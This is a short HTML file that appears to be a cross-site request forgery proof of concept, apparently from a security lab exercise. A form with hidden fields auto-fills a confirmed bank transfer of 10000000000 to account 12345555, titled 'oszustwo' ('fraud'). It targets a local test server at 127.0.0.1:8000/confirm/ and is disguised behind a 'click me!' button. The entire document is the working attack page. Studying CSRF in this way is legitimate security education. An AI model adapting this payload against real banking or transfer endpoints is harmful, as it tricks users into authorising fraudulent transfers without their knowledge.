<!DOCTYPE html>
<head>
</head>
<body>
    <form action="http://127.0.0.1:8000/confirm/" method="POST">
        <input type = "hidden" name = "confirmed" value = True />
        <input type = "hidden" name = "title" value = "oszustwo" />
        <input type = "hidden" name = "content" value = "nielegalny_przelew" />
        <input type = "hidden" name = "value" value = "10000000000" />
        <input type = "hidden" name = "account" value = "12345555" />
        <input type = "hidden" name = "confirmation" value = "true" />
        <button type="submit">click me!</button>
    </form>
</body>
</html>
